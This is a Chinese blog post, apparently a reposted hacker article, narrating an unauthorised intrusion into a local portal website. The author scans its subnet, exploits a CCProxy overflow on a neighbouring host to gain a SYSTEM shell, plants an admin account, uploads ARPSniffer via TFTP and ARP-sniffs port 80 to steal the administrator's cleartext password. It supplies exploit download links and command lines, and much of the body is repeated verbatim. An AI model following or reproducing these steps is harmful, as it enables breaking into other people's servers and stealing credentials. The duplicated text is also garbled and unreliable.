? 還記得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章嗎?自從上次入侵之后,網(wǎng)站的管理員想盡了辦法堵住了所有SQL注入漏洞,想通過SQL注入后臺管理頁面已經(jīng)沒有可能了。真是郁悶,但是轉(zhuǎn)念一想,這正是一個練習技術的好機會,難道除了簡單的工具利用外,我就沒有其它的辦法了嗎?一定要想法子再次拿下這個站點。
一、掃描,突現(xiàn)新曙光
想來想去找不到什么好的辦法,閑著也無事,于是習慣性的用X-scan掃描了一下與本地信息港(203.207.***.2)位于同一C段的IP地址。結果在掃描到的結果中發(fā)現(xiàn)有許多存活主機,而且其中有一些主機好像還有系統(tǒng)漏洞可以利用。唉,只可惜這些主機都不是我要進攻的目標!
面對掃描出來的結果發(fā)了好久的呆,突然大腦中靈光一閃冒出了一個念頭:這些網(wǎng)站中說不定有某個與信息港位于同一個交換機內(nèi)呢!如果我能進入控制與信息港位于同一交換機下的站點,就可以利用小榕哥的另外一個工具ARPSniffer.EXE,監(jiān)聽信息港站點中的一舉一動,如果能嗅探到通過80端口傳輸?shù)叫畔⒏鄣木W(wǎng)站管理員密碼,不就成功地搞定信息港了嗎?看來方案可行!于是我開始了又一輪攻擊。
二、利用溢出漏洞拿下第一站
在掃描到的C段IP地址中試驗了幾個站點,第一個站點居然還有SA空口令的漏洞,可惜連接上去后發(fā)現(xiàn)與信息港并不在同一個交換機下。另一個站點存在Serv-U溢出漏洞,可惜也無法利用。剩下的其它網(wǎng)站好像看不出有什么問題來,只有一個網(wǎng)站(203.207.***.44)有些奇怪,在端口掃描結果中發(fā)現(xiàn)它好像開放了“TCP 808”端口。也不知道這個奇怪的端口是拿來做什么的(如圖1)?
圖1
于是上Google搜索了一下,呵呵,這下收獲可大了!從搜索結果了解到,原來808端口是網(wǎng)站中一個叫作CCProxy的軟件打開的。CCProxy是國內(nèi)一個常用的代理服務器軟件,它可以輕松建立各種代理服務器,國內(nèi)的許多企業(yè)都使用它代理上網(wǎng),記得當初我還用它將一臺肉雞建成了一個全能的代理服務器,怎么就給忘記了呢?恰巧被掃描的網(wǎng)站也是一個企業(yè)站點,看來這個網(wǎng)站的808端口十有八九是CCProxy打開的啦。最重要的是從網(wǎng)上還了解到這個CCProxy代理服務器軟件剛發(fā)現(xiàn)了一個最新的遠程漏洞,于是趕緊下載了一個溢出程序試試(下載地址:ttp://www.nuoya.org/down/soft/CCProxy.rar)。
(小提示:CCProxy打開的端口可能還有1080、2121等,這些是用來提供Socks和FTP服務的。)
CCProxy溢出程序的使用非常簡單,在命令窗口中輸入“ccpx 目標IP地址 端口”,然后按提示操作即可(如圖2)。在溢出中會詢問本機是與攻擊目標位于同一個IP段;如果是在同一IP地址段中的話,直接按“y”,就可以開始溢出了;如果本機與攻擊目標不在一個IP地址段中的話,按下“n”,溢出程序?qū)⒗^續(xù)提示并詢問本機是否有一個公網(wǎng)IP地址(如圖3),如果沒有的話,還需要手工輸入自己的網(wǎng)關IP地址才可以開始溢出。溢出成功后,會在當前命令窗口中自動連接攻擊目標的24876端口,獲得遠程主機的一個SYSTEM Shell。剩下來的事就是建立管理員帳號,常常的掌握這臺肉機。
圖2
圖3
三、上傳嗅探利器ARPSniffer
現(xiàn)在要通過手里的肉雞入侵信息港了。首先還是要查看一下兩個網(wǎng)站服務器是不是位于同一個交換機下。遠程連接肉機,在肉雞的CMD窗口中輸入命令“tracert 攻擊目標IP地址”,令人興奮的是看到直接返回了目標IP地址(如圖4),現(xiàn)在可以確定兩臺主機都在同一交換機下了,看來有戲啦!可以考慮用嗅探的方法從肉雞上獲取信息港的管理員密碼或者其它有用的信息。現(xiàn)在要用到的是一個名叫“ARPSniffer.exe”的軟件(下載地址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。這個軟件有DOS版和WIN版,RPSniffer也是小榕哥開發(fā)的一款工具非常好的嗅探工具,它可以用在交換機的環(huán)境下。在使用這個嗅探工具前首先要使用機器上安裝WinPCAP驅(qū)動。怎么上傳ARPSniffer到肉雞上?還是老方法用TFTP傳送。在本機上運行Tfpd32,將本機建成為一個TFTP服務器,點擊界面中的“Browse”按鈕,選擇ARPSniffer下載壓縮包的解壓路徑(如圖5),然后在肉雞的命令窗口中運行“Get -i TFTP服務器IP地址 文件名”即可。在這里下載后的壓縮包中有兩個版本的程序,我們只需要上傳“arpsniffer.exe”和“WinPcap_3_0_a.exe”即可。上傳成功后先運行“WinPcap_3_0_a.exe”安裝嗅探驅(qū)動程序。
圖4
圖5
四、利用ARPSniffer滲透攻擊真正目標
現(xiàn)在是萬事具備,只欠嗅探。先在命令窗口中運行“Ipconfig /all”命令,查看一下肉雞上的網(wǎng)址配置情況和網(wǎng)關IP地址(如圖6)。可以查到網(wǎng)關(Default Gateway)為“203.207.***.1”,運行ARPSniffer命令:
“Arpsniffer203.207.***.1203.207.***.280 c:/password.txt”;
即可開始在肉雞上監(jiān)聽攻擊目標IP的80端口了(如圖7)。攻擊目標IP上所有通過80端口收發(fā)的密碼將被保存在“Password.txt”文件中。在嗅探時需要注意,如果在肉雞上安裝有兩塊網(wǎng)卡的話,還要在剛才的Arpsniffer命令后加上數(shù)字參數(shù)指定嗅探的網(wǎng)卡ID。
圖6
圖7
(小提示:當然我們也可以嗅探其它的端口,如21和25端口等獲得Telnet密碼。但是由于管理員以Web方式登錄的幾率較大些,所以我們選擇了嗅探80Web端口。)
五、獲得管理員密碼
最后剩下來的事情就是坐著等待攻擊目標網(wǎng)站上的管理員登錄了。很快就看到了肉雞上的命令窗口中有了反應,打開“password.txt”就可以看到密碼。不過由于我們還在監(jiān)聽過程中,所以“password.txt”文件是無法直接打開的,而且也不能復制。想要查看密碼記錄文件,必須先終止嗅探進程。可以在肉雞嗅探窗口中直接按下“Ctrl+C”鍵,就可以中止嗅探了。不過可能同時也會將我們在本機與肉雞建立的連接窗口關閉掉了。結束后看一看,呵呵,真的有收獲啦,網(wǎng)站管理的密碼都以明文的方式保存在文本里面啦!現(xiàn)在還等什么呢?又可以以管理員身份登入信息港故地重游啦!
一、掃描,突現(xiàn)新曙光
想來想去找不到什么好的辦法,閑著也無事,于是習慣性的用X-scan掃描了一下與本地信息港(203.207.***.2)位于同一C段的IP地址。結果在掃描到的結果中發(fā)現(xiàn)有許多存活主機,而且其中有一些主機好像還有系統(tǒng)漏洞可以利用。唉,只可惜這些主機都不是我要進攻的目標!
面對掃描出來的結果發(fā)了好久的呆,突然大腦中靈光一閃冒出了一個念頭:這些網(wǎng)站中說不定有某個與信息港位于同一個交換機內(nèi)呢!如果我能進入控制與信息港位于同一交換機下的站點,就可以利用小榕哥的另外一個工具ARPSniffer.EXE,監(jiān)聽信息港站點中的一舉一動,如果能嗅探到通過80端口傳輸?shù)叫畔⒏鄣木W(wǎng)站管理員密碼,不就成功地搞定信息港了嗎?看來方案可行!于是我開始了又一輪攻擊。
二、利用溢出漏洞拿下第一站
在掃描到的C段IP地址中試驗了幾個站點,第一個站點居然還有SA空口令的漏洞,可惜連接上去后發(fā)現(xiàn)與信息港并不在同一個交換機下。另一個站點存在Serv-U溢出漏洞,可惜也無法利用。剩下的其它網(wǎng)站好像看不出有什么問題來,只有一個網(wǎng)站(203.207.***.44)有些奇怪,在端口掃描結果中發(fā)現(xiàn)它好像開放了“TCP 808”端口。也不知道這個奇怪的端口是拿來做什么的(如圖1)?
圖1
于是上Google搜索了一下,呵呵,這下收獲可大了!從搜索結果了解到,原來808端口是網(wǎng)站中一個叫作CCProxy的軟件打開的。CCProxy是國內(nèi)一個常用的代理服務器軟件,它可以輕松建立各種代理服務器,國內(nèi)的許多企業(yè)都使用它代理上網(wǎng),記得當初我還用它將一臺肉雞建成了一個全能的代理服務器,怎么就給忘記了呢?恰巧被掃描的網(wǎng)站也是一個企業(yè)站點,看來這個網(wǎng)站的808端口十有八九是CCProxy打開的啦。最重要的是從網(wǎng)上還了解到這個CCProxy代理服務器軟件剛發(fā)現(xiàn)了一個最新的遠程漏洞,于是趕緊下載了一個溢出程序試試(下載地址:ttp://www.nuoya.org/down/soft/CCProxy.rar)。
(小提示:CCProxy打開的端口可能還有1080、2121等,這些是用來提供Socks和FTP服務的。)
CCProxy溢出程序的使用非常簡單,在命令窗口中輸入“ccpx 目標IP地址 端口”,然后按提示操作即可(如圖2)。在溢出中會詢問本機是與攻擊目標位于同一個IP段;如果是在同一IP地址段中的話,直接按“y”,就可以開始溢出了;如果本機與攻擊目標不在一個IP地址段中的話,按下“n”,溢出程序?qū)⒗^續(xù)提示并詢問本機是否有一個公網(wǎng)IP地址(如圖3),如果沒有的話,還需要手工輸入自己的網(wǎng)關IP地址才可以開始溢出。溢出成功后,會在當前命令窗口中自動連接攻擊目標的24876端口,獲得遠程主機的一個SYSTEM Shell。剩下來的事就是建立管理員帳號,常常的掌握這臺肉機。
圖2
圖3
三、上傳嗅探利器ARPSniffer
現(xiàn)在要通過手里的肉雞入侵信息港了。首先還是要查看一下兩個網(wǎng)站服務器是不是位于同一個交換機下。遠程連接肉機,在肉雞的CMD窗口中輸入命令“tracert 攻擊目標IP地址”,令人興奮的是看到直接返回了目標IP地址(如圖4),現(xiàn)在可以確定兩臺主機都在同一交換機下了,看來有戲啦!可以考慮用嗅探的方法從肉雞上獲取信息港的管理員密碼或者其它有用的信息。現(xiàn)在要用到的是一個名叫“ARPSniffer.exe”的軟件(下載地址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。這個軟件有DOS版和WIN版,RPSniffer也是小榕哥開發(fā)的一款工具非常好的嗅探工具,它可以用在交換機的環(huán)境下。在使用這個嗅探工具前首先要使用機器上安裝WinPCAP驅(qū)動。怎么上傳ARPSniffer到肉雞上?還是老方法用TFTP傳送。在本機上運行Tfpd32,將本機建成為一個TFTP服務器,點擊界面中的“Browse”按鈕,選擇ARPSniffer下載壓縮包的解壓路徑(如圖5),然后在肉雞的命令窗口中運行“Get -i TFTP服務器IP地址 文件名”即可。在這里下載后的壓縮包中有兩個版本的程序,我們只需要上傳“arpsniffer.exe”和“WinPcap_3_0_a.exe”即可。上傳成功后先運行“WinPcap_3_0_a.exe”安裝嗅探驅(qū)動程序。
圖4
圖5
四、利用ARPSniffer滲透攻擊真正目標
現(xiàn)在是萬事具備,只欠嗅探。先在命令窗口中運行“Ipconfig /all”命令,查看一下肉雞上的網(wǎng)址配置情況和網(wǎng)關IP地址(如圖6)。可以查到網(wǎng)關(Default Gateway)為“203.207.***.1”,運行ARPSniffer命令:
“Arpsniffer203.207.***.1203.207.***.280 c:/password.txt”;
即可開始在肉雞上監(jiān)聽攻擊目標IP的80端口了(如圖7)。攻擊目標IP上所有通過80端口收發(fā)的密碼將被保存在“Password.txt”文件中。在嗅探時需要注意,如果在肉雞上安裝有兩塊網(wǎng)卡的話,還要在剛才的Arpsniffer命令后加上數(shù)字參數(shù)指定嗅探的網(wǎng)卡ID。
圖6
圖7
(小提示:當然我們也可以嗅探其它的端口,如21和25端口等獲得Telnet密碼。但是由于管理員以Web方式登錄的幾率較大些,所以我們選擇了嗅探80Web端口。)
五、獲得管理員密碼
最后剩下來的事情就是坐著等待攻擊目標網(wǎng)站上的管理員登錄了。很快就看到了肉雞上的命令窗口中有了反應,打開“password.txt”就可以看到密碼。不過由于我們還在監(jiān)聽過程中,所以“password.txt”文件是無法直接打開的,而且也不能復制。想要查看密碼記錄文件,必須先終止嗅探進程。可以在肉雞嗅探窗口中直接按下“Ctrl+C”鍵,就可以中止嗅探了。不過可能同時也會將我們在本機與肉雞建立的連接窗口關閉掉了。結束后看一看,呵呵,真的有收獲啦,網(wǎng)站管理的密碼都以明文的方式保存在文本里面啦!現(xiàn)在還等什么呢?又可以以管理員身份登入信息港故地重游啦!
更多文章、技術交流、商務合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯(lián)系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元
